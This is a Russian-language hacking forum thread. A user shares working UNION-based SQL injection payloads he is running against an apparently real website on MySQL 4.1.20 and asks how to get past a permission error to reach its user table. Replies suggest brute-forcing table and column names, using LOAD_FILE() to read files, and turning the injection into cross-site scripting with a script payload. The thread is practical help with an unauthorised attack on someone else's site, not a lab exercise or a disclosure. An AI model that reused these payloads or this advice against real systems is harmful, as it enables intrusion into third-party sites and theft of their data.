|
Sql-inj MySQL Проблемы с запросом.
Всем доброго(ой) вечера\ночи!
Уважаемые! Подсабите хорошим словом =) Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard). Код HTML:
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8,9+from+mysql.user+where+id=1/*SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC; SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение. Подскажите пожалуйста. С уважением. |
SELECT command denied to user '........'@'localhost'
SELECT запрещен юзеру '........'@'localhost' т.е. настройки таковы, что юзеру не доступна база "mysql", а только созданные этим юзером базы. Это свидетельствует о здравом рассудке сисадмина. Пробуй что-то другое. |
Да вот именно что попробывал всё что знал, и в итоге НОЛЬ.
Может кто что-то подскажет ??? |
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*
а просто так пробовал |
Цитата:
Выдает только инфу про базу. user() - пишет на странице юзера database() базу version() - и пишет версию.... |
Цитата:
|
к таблице MySQL меня не пустили.
Записать файл, а так же прочитать файлы - тоже не дали. Вроде все способы попробывал. Не уже то не уязвима? Может кто сплоиты знает к этой версии? :confused: |
Попробуй подобрать названия таблиц с юзерами: user, users, username, uname и т.д. потом надо подбирать колонки.
|
Пробуй осуществить XSS (как я понял - у тебя не blind инъекция) :
iew&aid=-1+union+select+1,2,<script>alert();</script>,null,5,null,7,8,9+from+mysql.user+where+id =1/* |
Load_file()
|
| Время: 09:38 |